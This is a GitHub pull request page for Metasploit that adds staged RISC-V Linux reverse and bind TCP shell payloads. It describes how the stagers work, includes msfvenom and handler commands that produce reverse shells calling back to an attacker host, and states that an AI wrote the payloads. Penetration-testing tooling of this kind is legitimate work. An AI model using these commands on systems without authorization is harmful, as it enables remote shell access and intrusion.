Skip to content

Add staged RISC-V (riscv64le/riscv32le) Linux payloads#21237

Open
bcoles wants to merge 1 commit intorapid7:masterfrom
bcoles:riscv-staged-payloads
Open

Add staged RISC-V (riscv64le/riscv32le) Linux payloads#21237
bcoles wants to merge 1 commit intorapid7:masterfrom
bcoles:riscv-staged-payloads

Conversation

@bcoles
Copy link
Copy Markdown
Contributor

@bcoles bcoles commented Apr 5, 2026

Add reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.

Stagers:

  • socket -> connect/bind -> read 4-byte stage length -> mmap RWX -> read loop -> jump to stage
  • Socket fd passed to stage in s1 (x9, callee-saved)
  • handle_intermediate_stage sends stage length as 4-byte LE uint

Stages:

  • dup3 stdin/stdout/stderr from s1 -> execve("/bin/sh")
  • Shell path patchable via SHELL datastore option (16-byte field)

They were written entirely by Claude. Claude one-shotted them.

Verification

Generate payload:

./msfvenom -p linux/riscv64le/shell/reverse_tcp LHOST=192.168.200.204 LPORT=4444 -f elf -o reverse_tcp64
./msfvenom -p linux/riscv64le/shell/bind_tcp LPORT=4444 -f elf -o bind_tcp64
./msfvenom -p linux/riscv32le/shell/reverse_tcp LHOST=192.168.200.204 LPORT=4444 -f elf -o reverse_tcp32
./msfvenom -p linux/riscv32le/shell/bind_tcp LPORT=4444 -f elf -o bind_tcp32

Set up the stager reverse handler:

use exploit/multi/handler
set PAYLOAD linux/riscv64le/shell/reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run

Run the generated payload on a RISC-V system. When the stager connects back, the handler automatically sends the 4-byte length + stage. You should get a shell session.

@bcoles
Add staged RISC-V (riscv64le/riscv32le) Linux payloads
1c83490 
Add reverse_tcp and bind_tcp stagers and a shell command stage
for both RISC-V 64-bit and 32-bit little-endian Linux targets.

Stagers:
- socket -> connect/bind -> read 4-byte stage length ->
  mmap RWX -> read loop -> jump to stage
- Socket fd passed to stage in s1 (x9, callee-saved)
- handle_intermediate_stage sends stage length as 4-byte LE uint

Stages:
- dup3 stdin/stdout/stderr from s1 -> execve("/bin/sh")
- Shell path patchable via SHELL datastore option (16-byte field)
@bcoles bcoles added the riscv RISC-V label Apr 5, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

riscv RISC-V

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@bcoles @smcintyre-r7